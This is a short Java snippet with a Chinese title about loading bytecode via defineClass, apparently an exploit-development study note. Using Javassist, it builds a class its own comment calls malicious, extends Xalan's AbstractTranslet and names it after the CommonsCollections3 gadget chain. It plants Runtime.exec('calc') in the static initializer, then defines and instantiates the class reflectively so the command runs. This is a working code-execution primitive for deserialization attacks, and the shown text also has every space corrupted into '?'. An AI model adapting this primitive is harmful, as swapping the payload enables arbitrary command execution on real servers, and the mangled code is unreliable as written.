利用defineClass加载字节码

package?com.naihe;

import?javassist.CannotCompileException;
import?javassist.ClassPool;
import?javassist.CtClass;
import?javassist.NotFoundException;

import?java.io.IOException;
import?java.lang.reflect.InvocationTargetException;
import?java.lang.reflect.Method;

public?class?DC?{
????public?static?void?main(String[]?args)?throws?InvocationTargetException,?IllegalAccessException,?NoSuchMethodException,?InstantiationException,?NotFoundException,?CannotCompileException,?IOException?{
????????//通过字节码构建恶意类
????????ClassPool?classPool=ClassPool.getDefault();
????????String?AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
????????classPool.appendClassPath(AbstractTranslet);
????????CtClass?payload=classPool.makeClass("CommonsCollections3");
????????payload.setSuperclass(classPool.get(AbstractTranslet));
????????payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");
????????byte[]?code=payload.toBytecode();

????????Method?defineClass?=?ClassLoader.class.getDeclaredMethod("defineClass",?String.class,?byte[].class,?int.class,?int.class);
????????defineClass.setAccessible(true);
????????Class?yyds=?(Class)?defineClass.invoke(ClassLoader.getSystemClassLoader(),?"CommonsCollections3",?code,?0,?code.length);
????????yyds.newInstance();

????}
}

?